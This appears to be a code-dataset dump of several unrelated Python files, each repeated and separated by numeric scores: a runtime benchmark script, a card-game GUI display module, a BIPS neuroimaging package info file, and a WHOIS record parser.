help="Number of timing entries") # specific to FIBONACCI parser.add_argument("-f", "--fibonacci", type=int, default=43, help="Fibonacci value") parser.add_argument("-c", "--cutoff", type=int, default=23, help="Fibonacci cutoff") args = parser.parse_args() # log file lout = open("{}.txt".format(args.prefix.strip('_')), 'w') m_N = args.size # matrix size is N x N m_I = args.iterations # number of iterations per timing entry m_E = args.entries # number of timing entries m_F = args.fibonacci # fibonacci value m_C = args.cutoff # cutoff value mtx_keys = [] fib_keys = [] mtx_time_data = {"y": [], "yerr": []} fib_time_data = {"y": [], "yerr": []} mtx_over_data = {"y": [], "yerr": []} fib_over_data = {"y": [], "yerr": []} # calculate the baseline first submodules.remove(args.baseline) submodules = [args.baseline] + submodules if "matrix" in args.modes: for lang in args.languages: baseline = None for submodule in submodules: key = "[{}]> {}_{}".format( lang.upper(), "MATMUL", submodule.upper()) lprint("Executing {}...".format(key)) ret = getattr(bench, submodule).matmul(m_N, m_E, m_I, lang) if ret is not None: if baseline is None: baseline = ret data = print_info(ret, key, baseline=baseline) lprint("") # spacing module = submodule.upper() mtx_keys += ["{}_MATMUL_{}".format(lang.upper(), module)] mtx_time_data["y"] += [data["runtime"][0]] mtx_over_data["y"] += [data["overhead"][0]] mtx_time_data["yerr"] += [data["runtime"][1]] mtx_over_data["yerr"] += [data["overhead"][1]] if len(mtx_keys) > 0: plot(mtx_keys, mtx_time_data["y"], mtx_time_data["yerr"], "Matrix Multiply ({} x {}) Runtime".format( m_N, m_N), "{}_MATMUL_RUNTIME.png".format(args.prefix.upper())) plot(mtx_keys, mtx_over_data["y"], mtx_over_data["yerr"], "Matrix Multiply ({} x {}) Overhead".format( m_N, m_N), "{}_MATMUL_OVERHEAD.png".format(args.prefix.upper())) if "fibonacci" in args.modes: for lang in args.languages: baseline = None for submodule in submodules: key = "[{}]> {}_{}".format( lang.upper(), "FIBONACCI", submodule.upper()) lprint("Executing {}...".format(key)) ret = getattr(bench, submodule).fibonacci(m_F, m_C, m_I, lang) if ret is not None: if baseline is None: baseline = ret data = print_info(ret, key, baseline=baseline) lprint("") # spacing module = submodule.upper() fib_keys += ["{}_FIB_{}".format(lang.upper(), module)] fib_time_data["y"] += [data["runtime"][0]] fib_over_data["y"] += [data["overhead"][0]] fib_time_data["yerr"] += [data["runtime"][1]] fib_over_data["yerr"] += [data["overhead"][1]] if len(fib_keys) > 0: plot(fib_keys, fib_time_data["y"], fib_time_data["yerr"], "Fibonacci({}, {}) Runtime".format( m_F, m_C), "{}_FIBONACCI_RUNTIME.png".format(args.prefix.upper().strip("_"))) plot(fib_keys, fib_over_data["y"], fib_over_data["yerr"], "Fibonacci({}, {}) Overhead".format( m_F, m_C), "{}_FIBONACCI_OVERHEAD.png".format(args.prefix.upper().strip("_"))) lout.close()
0.409103
0.294722
from enum import Enum, auto from typing import Optional from shimmer.display.data_structures import Color from shimmer.display.alignment import ( HorizontalAlignment, VerticalAlignment, ) from shimmer.display.components.box import Box, BoxDefinition from shimmer.display.widgets.text_box import TextBoxDefinition, TextBox, LabelDefinition from ..backend.definitions import CardDefinition, CardPair class CardDisplay(Box): size = 100, 60 class CardFacingEnum(Enum): number = auto() action = auto() def __init__(self): super(CardDisplay, self).__init__( BoxDefinition( width=self.size[0], height=self.size[1], dynamic_size=False, background_color=Color(40, 40, 40), ) ) self.card: Optional[CardDefinition] = None self.text_box = TextBox(TextBoxDefinition(label=LabelDefinition("",),)) self.text_box.set_position_in_alignment_with( self, HorizontalAlignment.center, VerticalAlignment.center ) self.add(self.text_box) def set_card(self, card: CardDefinition, facing: CardFacingEnum) -> None: self.card = card if facing == self.CardFacingEnum.number: self.text_box.text = str(self.card.number) elif facing == self.CardFacingEnum.action: self.text_box.text = str(self.card.action.name) # And re-align the text within this Box. self.text_box.set_position_in_alignment_with( self, HorizontalAlignment.center, VerticalAlignment.center ) class CardPairDisplay(Box): def __init__(self): super(CardPairDisplay, self).__init__() self.card_pair: Optional[CardPair] = None self.number_card_display: CardDisplay = CardDisplay() self.number_card_display.position = 0, CardDisplay.size[1] + 10 self.action_card_display: CardDisplay = CardDisplay() self.add(self.number_card_display, z=-1) self.add(self.action_card_display, z=-1) child_boundary_rect = self.bounding_rect_of_children() # TODO don't use set size self._set_size( width=child_boundary_rect.width, height=child_boundary_rect.height ) def set_card_pair(self, card_pair: CardPair) -> None: self.card_pair = card_pair self.number_card_display.set_card( self.card_pair.number_card, facing=CardDisplay.CardFacingEnum.number ) self.action_card_display.set_card( self.card_pair.action_card, facing=CardDisplay.CardFacingEnum.action )
est8/frontend/card.py
from enum import Enum, auto from typing import Optional from shimmer.display.data_structures import Color from shimmer.display.alignment import ( HorizontalAlignment, VerticalAlignment, ) from shimmer.display.components.box import Box, BoxDefinition from shimmer.display.widgets.text_box import TextBoxDefinition, TextBox, LabelDefinition from ..backend.definitions import CardDefinition, CardPair class CardDisplay(Box): size = 100, 60 class CardFacingEnum(Enum): number = auto() action = auto() def __init__(self): super(CardDisplay, self).__init__( BoxDefinition( width=self.size[0], height=self.size[1], dynamic_size=False, background_color=Color(40, 40, 40), ) ) self.card: Optional[CardDefinition] = None self.text_box = TextBox(TextBoxDefinition(label=LabelDefinition("",),)) self.text_box.set_position_in_alignment_with( self, HorizontalAlignment.center, VerticalAlignment.center ) self.add(self.text_box) def set_card(self, card: CardDefinition, facing: CardFacingEnum) -> None: self.card = card if facing == self.CardFacingEnum.number: self.text_box.text = str(self.card.number) elif facing == self.CardFacingEnum.action: self.text_box.text = str(self.card.action.name) # And re-align the text within this Box. self.text_box.set_position_in_alignment_with( self, HorizontalAlignment.center, VerticalAlignment.center ) class CardPairDisplay(Box): def __init__(self): super(CardPairDisplay, self).__init__() self.card_pair: Optional[CardPair] = None self.number_card_display: CardDisplay = CardDisplay() self.number_card_display.position = 0, CardDisplay.size[1] + 10 self.action_card_display: CardDisplay = CardDisplay() self.add(self.number_card_display, z=-1) self.add(self.action_card_display, z=-1) child_boundary_rect = self.bounding_rect_of_children() # TODO don't use set size self._set_size( width=child_boundary_rect.width, height=child_boundary_rect.height ) def set_card_pair(self, card_pair: CardPair) -> None: self.card_pair = card_pair self.number_card_display.set_card( self.card_pair.number_card, facing=CardDisplay.CardFacingEnum.number ) self.action_card_display.set_card( self.card_pair.action_card, facing=CardDisplay.CardFacingEnum.action )
0.753739
0.109658
_version_major = 0 _version_minor = 1 _version_micro = 0 _version_extra = '.dev' def get_nipype_gitversion(): """Nipype version as reported by the last commit in git Returns ------- None or str Version of NiPype according to git. """ import os import subprocess try: import bips gitpath = os.path.realpath(os.path.join(os.path.dirname(bips.__file__), os.path.pardir)) except: gitpath = os.getcwd() gitpathgit = os.path.join(gitpath, '.git') if not os.path.exists(gitpathgit): return None ver = None try: o, _ = subprocess.Popen('git describe', shell=True, cwd=gitpath, stdout=subprocess.PIPE).communicate() except Exception: pass else: ver = o.strip().split('-')[-1] return ver if '.dev' in _version_extra: gitversion = get_nipype_gitversion() if gitversion: _version_extra = '.' + gitversion + '-' + 'dev' # Format expected by setup.py and doc/source/conf.py: string of form "X.Y.Z" __version__ = "%s.%s.%s%s" % (_version_major, _version_minor, _version_micro, _version_extra) CLASSIFIERS = ["Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Science/Research", "License :: OSI Approved :: BSD License", "Operating System :: OS Independent", "Programming Language :: Python", "Topic :: Scientific/Engineering"] description = 'Neuroimaging in Python: Pipelines and Interfaces' # Note: this long_description is actually a copy/paste from the top-level # README.rst.txt, so that it shows up nicely on PyPI. So please remember to edit # it only in one place and sync it correctly. long_description = \ """ ============================= BIPS: Brain Imaging Pipelines ============================= The goal of BIPS is to present a set of brain imaging workflows for analysis of diffusion, structural and functional mri data. """ # requirement versions NIPYPE_MIN_VERSION = '0.5.3' NAME = 'bips' MAINTAINER = "bips developers" MAINTAINER_EMAIL = "<EMAIL>, <EMAIL>" DESCRIPTION = description LONG_DESCRIPTION = long_description URL = "http://bips.incf.org" DOWNLOAD_URL = "http://github.com/INCF/BrainImagingPipelines/archives/master" LICENSE = "Apache 2.0" CLASSIFIERS = CLASSIFIERS AUTHOR = "bips developmers" AUTHOR_EMAIL = "<EMAIL>, <EMAIL>" PLATFORMS = "OS Independent" MAJOR = _version_major MINOR = _version_minor MICRO = _version_micro ISRELEASE = _version_extra == '' VERSION = __version__ REQUIRES = ["nipype (>=0.5.3)"] STATUS = 'beta'
bips/info.py
_version_major = 0 _version_minor = 1 _version_micro = 0 _version_extra = '.dev' def get_nipype_gitversion(): """Nipype version as reported by the last commit in git Returns ------- None or str Version of NiPype according to git. """ import os import subprocess try: import bips gitpath = os.path.realpath(os.path.join(os.path.dirname(bips.__file__), os.path.pardir)) except: gitpath = os.getcwd() gitpathgit = os.path.join(gitpath, '.git') if not os.path.exists(gitpathgit): return None ver = None try: o, _ = subprocess.Popen('git describe', shell=True, cwd=gitpath, stdout=subprocess.PIPE).communicate() except Exception: pass else: ver = o.strip().split('-')[-1] return ver if '.dev' in _version_extra: gitversion = get_nipype_gitversion() if gitversion: _version_extra = '.' + gitversion + '-' + 'dev' # Format expected by setup.py and doc/source/conf.py: string of form "X.Y.Z" __version__ = "%s.%s.%s%s" % (_version_major, _version_minor, _version_micro, _version_extra) CLASSIFIERS = ["Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Science/Research", "License :: OSI Approved :: BSD License", "Operating System :: OS Independent", "Programming Language :: Python", "Topic :: Scientific/Engineering"] description = 'Neuroimaging in Python: Pipelines and Interfaces' # Note: this long_description is actually a copy/paste from the top-level # README.rst.txt, so that it shows up nicely on PyPI. So please remember to edit # it only in one place and sync it correctly. long_description = \ """ ============================= BIPS: Brain Imaging Pipelines ============================= The goal of BIPS is to present a set of brain imaging workflows for analysis of diffusion, structural and functional mri data. """ # requirement versions NIPYPE_MIN_VERSION = '0.5.3' NAME = 'bips' MAINTAINER = "bips developers" MAINTAINER_EMAIL = "<EMAIL>, <EMAIL>" DESCRIPTION = description LONG_DESCRIPTION = long_description URL = "http://bips.incf.org" DOWNLOAD_URL = "http://github.com/INCF/BrainImagingPipelines/archives/master" LICENSE = "Apache 2.0" CLASSIFIERS = CLASSIFIERS AUTHOR = "bips developmers" AUTHOR_EMAIL = "<EMAIL>, <EMAIL>" PLATFORMS = "OS Independent" MAJOR = _version_major MINOR = _version_minor MICRO = _version_micro ISRELEASE = _version_extra == '' VERSION = __version__ REQUIRES = ["nipype (>=0.5.3)"] STATUS = 'beta'
0.497315
0.184768
import re import pytz import copy from dateutil.parser import parse import WHOIS_parser from WHOIS_connect import WHOIS_srv_connect utc_timezone = pytz.utc # 设置utc时区 CHOSE_WHOIS_server = WHOIS_parser.WHOIS_info_extract_func() WHOIS_RECORD = { "domain": "", # 域名 "tld": "", # 顶级域 "flag": "", # 状态标记 "domain_status": "", # 域名状态 "sponsoring_registrar": "", # 注册商 "top_whois_server": "", # 顶级域名服务器 "sec_whois_server": "", # 二级域名服务器 "reg_name": "", # 注册姓名 "reg_phone": "", # 注册电话 "reg_email": "", # 注册email "org_name": "", # 注册公司名称 "creation_date": "", # 创建时间 "expiration_date": "", # 到期时间 "updated_date": "", # 更新时间 "details": "", # 原始信息(一级WHOIS信息 + 二级WHOIS信息) "top_whois_detail": "", # 一级WHOIS信息 "sec_whois_detail": "", # 二级WHOIS信息 "name_server": "", # 域名服务器 } # WHOIS 数据标记位 FLAG_CANT_DEAL = 0 # 不能处理 FLAG_OK = 1 # 正常 FLAG_NO_WHOIS_ADDR = -1 # 未找到WHOIS服务器 FLAG_TOP_WHOIS_FAILED = -2 # 一级WHOIS获取错误 FLAG_NO_SEC_WHOI_ADDR = -3 # 未找到二级WHOIS服务器 FLAG_SEC_WHOIS_FAILED = -4 # 二级WHOIS获取错误 FLAG_EMPTY_WHOIS_INFO = -5 # WHOIS信息为空 FLAG_INFO_EXTRACT_FAILED = -6 # WHOIS关键信息解析失败 # 状态值字典 WHOIS_STATUS_DICT = { # EPP "ADDPERIOD": "1", "AUTORENEWPERIOD": "2", "INACTIVE": "3", "OK": "4", "PENDINGCREATE": "5", "PENDINGDELETE": "6", "PENDINGRENEW": "7", "PENDINGRESTORE": "8", "PENDINGTRANSFER": "9", "PENDINGUPDATE": "10", "REDEMPTIONPERIOD": "11", "RENEWPERIOD": "12", "SERVERDELETEPROHIBITED": "13", "SERVERHOLD": "14", "SERVERRENEWPROHIBITED": "15", "SERVERTRANSFERPROHIBITED": "16", "SERVERUPDATEPROHIBITED": "17", "TRANSFERPERIOD": "18", "CLIENTDELETEPROHIBITED": "19", "CLIENTHOLD": "20", "CLIENTRENEWPROHIBITED": "21", "CLIENTTRANSFERPROHIBITED": "22", "CLIENTUPDATEPROHIBITED": "23", # RRP "ACTIVE": "24", "REGISTRYLOCK": "25", "REGISTRARLOCK": "26", "REGISTRYHOLD": "27", "REGISTRARHOLD": "28", # "REDEMPTIONPERIOD": "29", 重复 # "PENDINGRESTORE": "30", 重复 # "PENDINGDELETE": "31", 重复 "NOTEXIST": "29", # 域名不存在 "NOSTATUS": "30", # 无状态值 "CONNECT": "31", # de服务器状态 } def format_timestamp(str_time): """将时间字符串进行标准化处理""" try: time_parse = parse(str_time) # 解析日期为datetime型 except ValueError, e: return str_time try: time_parse = time_parse.astimezone(tz=utc_timezone) # 有时区转换为北京时间 except ValueError, e: time_parse = utc_timezone.localize(time_parse) # 无时区转换为localtime,即北京时间 D, T = str(time_parse).split(" ", 1) return D + " " + T[:8] def get_status_value(status_str): """ 将域名状态字符串转换成状态值 :param status_str: 域名状态字符串 :return: 状态值[若无状态则默认为30(NOSTATUS), 非标准状态值只变成大写""" global WHOIS_STATUS_DICT status_return = "" if status_str == "": return "30" infos = status_unite(status_str).split(";") for status in infos: status_value = WHOIS_STATUS_DICT.get(status, "0") if status_value == "0": status_value = status status_return += status_value status_return += ";" return status_return.strip(";") def status_unite(status): """状态字符串格式处理""" while status.find(" ") != -1: status = status.replace(" ", ";") while status.find("-") != -1: status = status.replace("-", ";") return status.upper() def is_xxx_exist(data): """用来判断com_manage函数中,得到的whois信息是否包含xxx标志,若包括则需要重新发送""" if data.find("\"xxx\"") != -1 and data.find("\"=xxx\"") != -1: return True else: return False def extract_sec_server(data, domain): """提取原始whois信息中的,二级whois服务器""" if not data: return False if data.find("Domain Name: %s" % domain.upper()) != -1: pos = data.find("Domain Name: %s" % domain.upper()) data = data[pos:] pattern = re.compile(r"Whois Server:.*|WHOIS Server:.*") sec_whois_server = "" for match in pattern.findall(data): if match.find("Server:") != -1: sec_whois_server = match.split(":")[1].strip() return False if sec_whois_server == "" else sec_whois_server elif data.find("Registrar WHOIS Server:") != -1: # ws二级服务器 pattern = re.compile(r"Registrar WHOIS Server:.*") sec_whois_server = "" for match in pattern.findall(data): if match.find("Server:") != -1: sec_whois_server = match.split(":")[1].strip() return False if sec_whois_server == "" else sec_whois_server else: return False def extract_WHOIS_info(domain_punycode, tld, whois_addr, data, flag, format_time=True, format_domain_status=True, list_name_server=True, socket_time_out=5, socket_retry_time=1, use_sock_proxy=False, proxy_type="SOCKS5", proxy_ip="", proxy_port="", proxy_username="", proxy_password="", use_relay_WHOIS_server=False ): # type: (str, str, str, str, int, bool, bool, bool, int, int, bool, str, str, str, str, str, bool) -> dict """ :param domain_punycode: punycode格式的域名 :param tld: 顶级域 :param whois_addr: whois服务器 :param data: 服务器返回数据 :param flag: 数据正确性标记位 :param format_time: 标准化时间 :param format_domain_status: 标准化域名标记 :param list_name_server: 列表格式记录域名NS服务器标记 :param socket_time_out: socket 连接超时时间 :param socket_retry_time: socket 连接最大重试次数 :param use_sock_proxy: 是否使用socks代理 :param proxy_type: 代理的类型(仅支持 SOCKS4 , SOCKS5 不支持 HTTP,HTTPS 代理) :param proxy_ip: 代理ip :param proxy_port: 代理端口 :param proxy_username: 代理用户名 :param proxy_password: 代理密码 :param use_relay_WHOIS_server: 是否使用转发服务器查询标记 :return: whois 信息字典 """ # 返回结果初始化 global WHOIS_RECORD, CHOSE_WHOIS_server domain_whois = copy.deepcopy(WHOIS_RECORD) domain_whois["domain"] = domain_punycode domain_whois["tld"] = tld domain_whois["top_whois_server"] = whois_addr domain_whois["top_whois_detail"] = data domain_whois["flag"] = flag # 1. 一级WHOIS错误,未找到WHOIS服务器,WHOIS信息为空 if domain_whois["flag"] < 0: # ,错误数据直接返回 粗处理直接返回 return domain_whois whois_details_first = data whois_details_sec = "" whois_extract_func = CHOSE_WHOIS_server.get_whois_func(whois_addr) sec_whois_srv = "" # 处理原始whois数据 if whois_extract_func == "com_manage" and tld in ["com", "net"]: # 针对com,net 等具有二级服务器的域名进行特殊处理 # 1,处理含有 "xxx="的情况 if is_xxx_exist(whois_details_first): whois_details_first = WHOIS_srv_connect("=" + domain_punycode, whois_addr, socket_time_out=socket_time_out, socket_retry_time=socket_retry_time, use_sock_proxy=use_sock_proxy, proxy_type=proxy_type, proxy_ip=proxy_ip, proxy_port=proxy_port, proxy_username=proxy_username, proxy_password=<PASSWORD>, use_relay_WHOIS_server=use_relay_WHOIS_server ) if whois_details_first.startswith("SOCKET ERROR"): domain_whois["flag"] = FLAG_TOP_WHOIS_FAILED # WHOIS服务器交互过程中出现异常 elif not whois_details_first: domain_whois["flag"] = FLAG_EMPTY_WHOIS_INFO # 获取到空数据 if domain_whois["flag"] < 0: # 错误数据直接返回 粗处理结果不调用提取函数 return domain_whois # 2,处理二级whois服务器 sec_whois_srv = extract_sec_server(whois_details_first, domain_punycode) if sec_whois_srv: # 如果获取到了二级whois地址,更新sec_whois并重新获取数据 domain_whois["sec_whois_server"] = sec_whois_srv whois_details_sec = WHOIS_srv_connect(domain_punycode, sec_whois_srv, socket_time_out=socket_time_out, socket_retry_time=socket_retry_time, use_sock_proxy=use_sock_proxy, proxy_type=proxy_type, proxy_ip=proxy_ip, proxy_port=proxy_port, proxy_username=proxy_username, proxy_password=<PASSWORD>, use_relay_WHOIS_server=use_relay_WHOIS_server ) if whois_details_sec.startswith("SOCKET ERROR"): domain_whois["flag"] = FLAG_SEC_WHOIS_FAILED # WHOIS服务器交互过程中出现异常 elif not whois_details_sec: domain_whois["flag"] = FLAG_EMPTY_WHOIS_INFO # 获取到空数据 domain_whois["sec_whois_detail"] = whois_details_sec else: domain_whois["flag"] = FLAG_NO_SEC_WHOI_ADDR # 没有获取到二级WHOIS服务器 domain_whois["details"] = whois_details_first + "\n##############################\n" + whois_details_sec # 使用提取函数处理whois获取字典 依次解析一级/二级WHOIS数据 try: sec_domain_whois = copy.deepcopy(domain_whois) domain_whois = getattr(WHOIS_parser, whois_extract_func)(whois_details_first, domain_whois) if whois_details_sec and sec_whois_srv: sec_whois_extract_func = CHOSE_WHOIS_server.get_whois_func(sec_whois_srv) sec_domain_whois = getattr(WHOIS_parser, sec_whois_extract_func)(whois_details_sec, sec_domain_whois) # 合并字典 for k in sec_domain_whois.keys(): # 只更新部分字段 if k in ["sponsoring_registrar", "sec_whois_server", "reg_name", "reg_phone", "reg_email", "org_name", "creation_date", "expiration_date", "updated_date", "name_server"]: if sec_domain_whois[k].strip(): domain_whois[k] = sec_domain_whois[k] except Exception as extract_error: domain_whois["flag"] = FLAG_INFO_EXTRACT_FAILED # 处理状态值、标准化时间时间字符串 if format_domain_status: domain_whois["domain_status"] = get_status_value(domain_whois["domain_status"]) if format_time: domain_whois["creation_date"] = format_timestamp(domain_whois["creation_date"]) domain_whois["expiration_date"] = format_timestamp(domain_whois["expiration_date"]) domain_whois["updated_date"] = format_timestamp(domain_whois["updated_date"]) if list_name_server: domain_whois["name_server"] = domain_whois["name_server"].split(";") return domain_whois if __name__ == '__main__': # use demo data = WHOIS_srv_connect("baidu.com", "whois.verisign-grs.com") wr = extract_WHOIS_info("baidu.com", "com", "whois.verisign-grs.com", data, 1) print data print wr
WHOISpy/WHOIS_info_extract.py
import re import pytz import copy from dateutil.parser import parse import WHOIS_parser from WHOIS_connect import WHOIS_srv_connect utc_timezone = pytz.utc # 设置utc时区 CHOSE_WHOIS_server = WHOIS_parser.WHOIS_info_extract_func() WHOIS_RECORD = { "domain": "", # 域名 "tld": "", # 顶级域 "flag": "", # 状态标记 "domain_status": "", # 域名状态 "sponsoring_registrar": "", # 注册商 "top_whois_server": "", # 顶级域名服务器 "sec_whois_server": "", # 二级域名服务器 "reg_name": "", # 注册姓名 "reg_phone": "", # 注册电话 "reg_email": "", # 注册email "org_name": "", # 注册公司名称 "creation_date": "", # 创建时间 "expiration_date": "", # 到期时间 "updated_date": "", # 更新时间 "details": "", # 原始信息(一级WHOIS信息 + 二级WHOIS信息) "top_whois_detail": "", # 一级WHOIS信息 "sec_whois_detail": "", # 二级WHOIS信息 "name_server": "", # 域名服务器 } # WHOIS 数据标记位 FLAG_CANT_DEAL = 0 # 不能处理 FLAG_OK = 1 # 正常 FLAG_NO_WHOIS_ADDR = -1 # 未找到WHOIS服务器 FLAG_TOP_WHOIS_FAILED = -2 # 一级WHOIS获取错误 FLAG_NO_SEC_WHOI_ADDR = -3 # 未找到二级WHOIS服务器 FLAG_SEC_WHOIS_FAILED = -4 # 二级WHOIS获取错误 FLAG_EMPTY_WHOIS_INFO = -5 # WHOIS信息为空 FLAG_INFO_EXTRACT_FAILED = -6 # WHOIS关键信息解析失败 # 状态值字典 WHOIS_STATUS_DICT = { # EPP "ADDPERIOD": "1", "AUTORENEWPERIOD": "2", "INACTIVE": "3", "OK": "4", "PENDINGCREATE": "5", "PENDINGDELETE": "6", "PENDINGRENEW": "7", "PENDINGRESTORE": "8", "PENDINGTRANSFER": "9", "PENDINGUPDATE": "10", "REDEMPTIONPERIOD": "11", "RENEWPERIOD": "12", "SERVERDELETEPROHIBITED": "13", "SERVERHOLD": "14", "SERVERRENEWPROHIBITED": "15", "SERVERTRANSFERPROHIBITED": "16", "SERVERUPDATEPROHIBITED": "17", "TRANSFERPERIOD": "18", "CLIENTDELETEPROHIBITED": "19", "CLIENTHOLD": "20", "CLIENTRENEWPROHIBITED": "21", "CLIENTTRANSFERPROHIBITED": "22", "CLIENTUPDATEPROHIBITED": "23", # RRP "ACTIVE": "24", "REGISTRYLOCK": "25", "REGISTRARLOCK": "26", "REGISTRYHOLD": "27", "REGISTRARHOLD": "28", # "REDEMPTIONPERIOD": "29", 重复 # "PENDINGRESTORE": "30", 重复 # "PENDINGDELETE": "31", 重复 "NOTEXIST": "29", # 域名不存在 "NOSTATUS": "30", # 无状态值 "CONNECT": "31", # de服务器状态 } def format_timestamp(str_time): """将时间字符串进行标准化处理""" try: time_parse = parse(str_time) # 解析日期为datetime型 except ValueError, e: return str_time try: time_parse = time_parse.astimezone(tz=utc_timezone) # 有时区转换为北京时间 except ValueError, e: time_parse = utc_timezone.localize(time_parse) # 无时区转换为localtime,即北京时间 D, T = str(time_parse).split(" ", 1) return D + " " + T[:8] def get_status_value(status_str): """ 将域名状态字符串转换成状态值 :param status_str: 域名状态字符串 :return: 状态值[若无状态则默认为30(NOSTATUS), 非标准状态值只变成大写""" global WHOIS_STATUS_DICT status_return = "" if status_str == "": return "30" infos = status_unite(status_str).split(";") for status in infos: status_value = WHOIS_STATUS_DICT.get(status, "0") if status_value == "0": status_value = status status_return += status_value status_return += ";" return status_return.strip(";") def status_unite(status): """状态字符串格式处理""" while status.find(" ") != -1: status = status.replace(" ", ";") while status.find("-") != -1: status = status.replace("-", ";") return status.upper() def is_xxx_exist(data): """用来判断com_manage函数中,得到的whois信息是否包含xxx标志,若包括则需要重新发送""" if data.find("\"xxx\"") != -1 and data.find("\"=xxx\"") != -1: return True else: return False def extract_sec_server(data, domain): """提取原始whois信息中的,二级whois服务器""" if not data: return False if data.find("Domain Name: %s" % domain.upper()) != -1: pos = data.find("Domain Name: %s" % domain.upper()) data = data[pos:] pattern = re.compile(r"Whois Server:.*|WHOIS Server:.*") sec_whois_server = "" for match in pattern.findall(data): if match.find("Server:") != -1: sec_whois_server = match.split(":")[1].strip() return False if sec_whois_server == "" else sec_whois_server elif data.find("Registrar WHOIS Server:") != -1: # ws二级服务器 pattern = re.compile(r"Registrar WHOIS Server:.*") sec_whois_server = "" for match in pattern.findall(data): if match.find("Server:") != -1: sec_whois_server = match.split(":")[1].strip() return False if sec_whois_server == "" else sec_whois_server else: return False def extract_WHOIS_info(domain_punycode, tld, whois_addr, data, flag, format_time=True, format_domain_status=True, list_name_server=True, socket_time_out=5, socket_retry_time=1, use_sock_proxy=False, proxy_type="SOCKS5", proxy_ip="", proxy_port="", proxy_username="", proxy_password="", use_relay_WHOIS_server=False ): # type: (str, str, str, str, int, bool, bool, bool, int, int, bool, str, str, str, str, str, bool) -> dict """ :param domain_punycode: punycode格式的域名 :param tld: 顶级域 :param whois_addr: whois服务器 :param data: 服务器返回数据 :param flag: 数据正确性标记位 :param format_time: 标准化时间 :param format_domain_status: 标准化域名标记 :param list_name_server: 列表格式记录域名NS服务器标记 :param socket_time_out: socket 连接超时时间 :param socket_retry_time: socket 连接最大重试次数 :param use_sock_proxy: 是否使用socks代理 :param proxy_type: 代理的类型(仅支持 SOCKS4 , SOCKS5 不支持 HTTP,HTTPS 代理) :param proxy_ip: 代理ip :param proxy_port: 代理端口 :param proxy_username: 代理用户名 :param proxy_password: 代理密码 :param use_relay_WHOIS_server: 是否使用转发服务器查询标记 :return: whois 信息字典 """ # 返回结果初始化 global WHOIS_RECORD, CHOSE_WHOIS_server domain_whois = copy.deepcopy(WHOIS_RECORD) domain_whois["domain"] = domain_punycode domain_whois["tld"] = tld domain_whois["top_whois_server"] = whois_addr domain_whois["top_whois_detail"] = data domain_whois["flag"] = flag # 1. 一级WHOIS错误,未找到WHOIS服务器,WHOIS信息为空 if domain_whois["flag"] < 0: # ,错误数据直接返回 粗处理直接返回 return domain_whois whois_details_first = data whois_details_sec = "" whois_extract_func = CHOSE_WHOIS_server.get_whois_func(whois_addr) sec_whois_srv = "" # 处理原始whois数据 if whois_extract_func == "com_manage" and tld in ["com", "net"]: # 针对com,net 等具有二级服务器的域名进行特殊处理 # 1,处理含有 "xxx="的情况 if is_xxx_exist(whois_details_first): whois_details_first = WHOIS_srv_connect("=" + domain_punycode, whois_addr, socket_time_out=socket_time_out, socket_retry_time=socket_retry_time, use_sock_proxy=use_sock_proxy, proxy_type=proxy_type, proxy_ip=proxy_ip, proxy_port=proxy_port, proxy_username=proxy_username, proxy_password=<PASSWORD>, use_relay_WHOIS_server=use_relay_WHOIS_server ) if whois_details_first.startswith("SOCKET ERROR"): domain_whois["flag"] = FLAG_TOP_WHOIS_FAILED # WHOIS服务器交互过程中出现异常 elif not whois_details_first: domain_whois["flag"] = FLAG_EMPTY_WHOIS_INFO # 获取到空数据 if domain_whois["flag"] < 0: # 错误数据直接返回 粗处理结果不调用提取函数 return domain_whois # 2,处理二级whois服务器 sec_whois_srv = extract_sec_server(whois_details_first, domain_punycode) if sec_whois_srv: # 如果获取到了二级whois地址,更新sec_whois并重新获取数据 domain_whois["sec_whois_server"] = sec_whois_srv whois_details_sec = WHOIS_srv_connect(domain_punycode, sec_whois_srv, socket_time_out=socket_time_out, socket_retry_time=socket_retry_time, use_sock_proxy=use_sock_proxy, proxy_type=proxy_type, proxy_ip=proxy_ip, proxy_port=proxy_port, proxy_username=proxy_username, proxy_password=<PASSWORD>, use_relay_WHOIS_server=use_relay_WHOIS_server ) if whois_details_sec.startswith("SOCKET ERROR"): domain_whois["flag"] = FLAG_SEC_WHOIS_FAILED # WHOIS服务器交互过程中出现异常 elif not whois_details_sec: domain_whois["flag"] = FLAG_EMPTY_WHOIS_INFO # 获取到空数据 domain_whois["sec_whois_detail"] = whois_details_sec else: domain_whois["flag"] = FLAG_NO_SEC_WHOI_ADDR # 没有获取到二级WHOIS服务器 domain_whois["details"] = whois_details_first + "\n##############################\n" + whois_details_sec # 使用提取函数处理whois获取字典 依次解析一级/二级WHOIS数据 try: sec_domain_whois = copy.deepcopy(domain_whois) domain_whois = getattr(WHOIS_parser, whois_extract_func)(whois_details_first, domain_whois) if whois_details_sec and sec_whois_srv: sec_whois_extract_func = CHOSE_WHOIS_server.get_whois_func(sec_whois_srv) sec_domain_whois = getattr(WHOIS_parser, sec_whois_extract_func)(whois_details_sec, sec_domain_whois) # 合并字典 for k in sec_domain_whois.keys(): # 只更新部分字段 if k in ["sponsoring_registrar", "sec_whois_server", "reg_name", "reg_phone", "reg_email", "org_name", "creation_date", "expiration_date", "updated_date", "name_server"]: if sec_domain_whois[k].strip(): domain_whois[k] = sec_domain_whois[k] except Exception as extract_error: domain_whois["flag"] = FLAG_INFO_EXTRACT_FAILED # 处理状态值、标准化时间时间字符串 if format_domain_status: domain_whois["domain_status"] = get_status_value(domain_whois["domain_status"]) if format_time: domain_whois["creation_date"] = format_timestamp(domain_whois["creation_date"]) domain_whois["expiration_date"] = format_timestamp(domain_whois["expiration_date"]) domain_whois["updated_date"] = format_timestamp(domain_whois["updated_date"]) if list_name_server: domain_whois["name_server"] = domain_whois["name_server"].split(";") return domain_whois if __name__ == '__main__': # use demo data = WHOIS_srv_connect("baidu.com", "whois.verisign-grs.com") wr = extract_WHOIS_info("baidu.com", "com", "whois.verisign-grs.com", data, 1) print data print wr
0.116512
0.198763
